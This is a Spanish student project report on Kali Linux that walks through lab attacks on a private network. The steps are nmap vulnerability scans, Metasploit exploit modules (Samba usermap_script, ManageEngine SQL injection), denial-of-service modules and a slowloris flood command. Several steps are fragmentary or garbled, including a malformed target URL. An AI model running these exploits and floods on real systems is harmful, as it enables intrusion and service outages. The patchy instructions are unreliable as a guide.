Proyecto de Redes
Proyecto de Redes
Proyecto de Redes
MATERIA:
Redes
TEMA:
KALI LINUX
AUTORES:
José Briones
Luis Delgado
Kevin Hernández
PROFESOR:
AÑO LECTIVO
2019
INDICE
CAPITULO I .................................................................................... 1
1. INTRODUCCIÓN ..................................................................................................................................... 1
1.1. CARACTERISTICAS DE KALI LINUX ................................................................................................. 2
1.2. DESCARGA DE KALI LINUX............................................................................................................. 2
1.3. INSTALACION DE KALI LINUX ........................................................................................................ 2
CAPITULO II .................................................................................. 3
2. OBJETIVOS DEL PROYECTO .................................................................................................................... 3
2.1. OBJETIVO GENERAL ...................................................................................................................... 3
2.2. OBJETIVO ESPECIFICO ................................................................................................................... 3
CAPITULO IV ............................................................................... 13
4. BIBLIOGRAFIA ...................................................................................................................................... 13
CAPITULO I
1. INTRODUCCIÓN
KALI LINUX
GNU/LINUX DEBIAN
Kali Linux es una distribución de LINUX BACKTRACK que ayuda a realizar Auditorías de
Seguridad y Pruebas de Penetración. Kali es un Sistema Operativo basado en GNU/Linux Debian,
siendo una reedificación completa de BACKTRACK, la cual abarca una gran cantidad de
herramientas que ayudan a capturar información, identificar vulnerabilidades, explotarlas, remontar
privilegios y cubrir huellas.
Kali Linux se incorpora completamente a los estándares de desarrollo de Debian. De hecho, tiene en
funcionamiento toda una nueva infraestructura, siendo todas las herramientas verificadas y
empaquetadas, y se utiliza ahora Git para el CVS
Se ha puesto en funcionamiento toda una nueva infraestructura, todas las herramientas han sido
revisadas y empaquetadas. Contando con más de 300 herramientas de Pruebas de Penetración.
Teniendo algunas características muy importantes a la hora de obtener el Sistemas Operativo.
Una de las opciones que nos da KALI LINUX, es que podemos adaptar diferentes herramientas
para una tare especifica o para un uso generalista, siendo esta de mucha ayuda para realizar tareas
habituales como escuchar música o ver videos y editar documentos o crearlos, sin necesidad de
instalar softwares adicionales.
Desde varios puntos de vista KALI LINUX, es la herramienta perfecta para hackers, que buscan (y
encuentran) los barreras y fisuras en la seguridad de las redes y sistemas informáticos. Claramente
no quiere decir que este orientado a cometer delitos cibernéticos, de hecho, esta direccionada con
herramienta para un análisis forense, con que podríamos descubrir por donde ha sido atacado un
sistema y posiblemente encontrar rastros del atacante.
1
1.1. CARACTERISTICAS DE KALI LINUX
KALI LINUX puede ser descargado en diferentes arquitecturas, como i386, amd64 y armel, armhf.
Solo para la arquitectura i386 puede ser descargado en dos formas en una imagen ISO o en una
máquina virtual para VMware. Además, podemos descargarlo mediante descarga directo o Torrent.
http://www.kali.org/downloads/
Lo podemos instalar en un disco duro, y realizar un arranque dual con un Sistema Operativo
Windows o instalarlo como unidad USB con o sin persistencia (guardar los procesos, información
de nuestro proyecto) e instalarlo en un disco cifrado. Podemos encontrar la información detallada
sobre la instalación de Kali Linux en la siguiente página:
http://docs.kali.org/category/installation
2
CAPITULO II
Investigar y practicar el uso de KALI LINUX para realizar escaneos en busca de los dispositivos
conectados a la Red Privada: 198.168.100.0/24, recolectando información de un objetivo
seleccionado, en busca de puerto abiertos y vulnerabilidades para así continuar con los ataques que
cada alumno desee realizar, por consiguiente, lograr el objetivo de vulnerar a un administrador.
3
CAPITULO III
#db_nmap -sV -O –script vuln 192.168.100.1 (Escaneo los puertos y busco vulnerabilidades en
los puertos con (--script vuln)
4
ALUMNO KEVIN HERNANDEZ
REPORTE DE ATAQUE
- Abrimos la Terminal
Lo primero que se debe hacer es identificar en que red estamos trabajando con el
#ifconfig.
Lo siguiente seria:
#nmap -sV
Es para identificar las IP que ping están en la red 192.168.56.100-200 a la vez especificamos el
rango de la red, es básico si queremos iniciar los ataques.
#msfconsole
Lo siguiente para verificar los servicios en funcionamiento en cada puerto especifico y la versión
del sistema que está usando:
#use exploit/multi/samba/usermap_script
#run
#use exploit/multi/http/manageengine_search_sqli
#run
Luego ya estando dentro probamos con un screenshot si tuvimos éxito se crearía un archivo con la
pantalla del usuario, luego vamos a la ruta donde se guardó el mismo y visualizamos el mismo.
Otro Ataque
ATAQUE Dos
5
#use auxiliary/dos/tcp/synflood (tipo de ataque que vamos a utilizar)
#exploit
Este ataque ayuda a que se caiga la página web que por ejemplo salga un mensaje que no tiene
acceso.
Otro Ataque
En consola ponemos
Luego ponemos:
#use auxiliary/dos/http/apache_tomcat_transfer_encoding
#run
#show options
#run
6
Otro Ataque
Al crear el archivo debemos enviarlo al pc víctima, pero en este caso es complicado ejecutar el
mismo.
Vamos a la terminal
Ya descargado lo que vamos a usar el sloworis para mandar varios paquetes a una dirección:
#cd Desktop
#cd slowloris.pl
#perl slowloris.pl -dns (url de la página que vas hacer ping) www.192.168.56.200 -port 80 -timeout
1 -num 10000 -cache
Para pararlo cntrl c, pero se enviarían los paquetes que indicaste para hacer más lenta a la página y
en el mejor de los casos bajarla.
7
ALUMNO LUIS DELGADO
REPORTE DE PROYECTO
MI DOCUMENTACION
Comandos básicos
#msfdb init
#msfconsole
#db_status
#workspace
#workspace -a p + nombre
#db_import /root/Escritorio/scanNmap
Módulos de Metasploit
#search arp_sweep
#use auxiliary/scanner/portscan/syn
#show options
#payload
8
#sesions -l lista las sesiones
#shell
Ataque ddos
9
Name Current Setting Required Description
Exploit target:
Id Name
-- ----
0 Automatic Targeting
EXITFUNC teread yes Exit technique (Accepted: '', seh, thread, process, none)
10
LHOST yes The listen address (an interface may be specified)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
[-] 192.168.100.1:445 - This most likely means a previous exploit attempt caused
the service to crash
root@kali: ~# cd Escritorio
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
Usage:
11
root@kali: ~# ping 192.168.100.2
12
CAPITULO IV
4. BIBLIOGRAFIA
http://www.reydes.com/archivos/Kali_Linux_v2_ReYDeS.pdf
https://www.udemy.com/kali-linux-para-principiantes-y-ethical-hacking-basico/
https://www.youtube.com/watch?v=UKkMP2UFs_s&vl=es
https://computerhoy.com/paso-a-paso/software/que-es-kali-linux-que-puedes-hacer-
41671
https://www.youtube.com/watch?v=QIW9NYWP7uA
https://www.youtube.com/watch?v=aS_9UTv8rck
https://www.creadpag.com/2018/05/ataques-ddos-en-kali-linux.html
13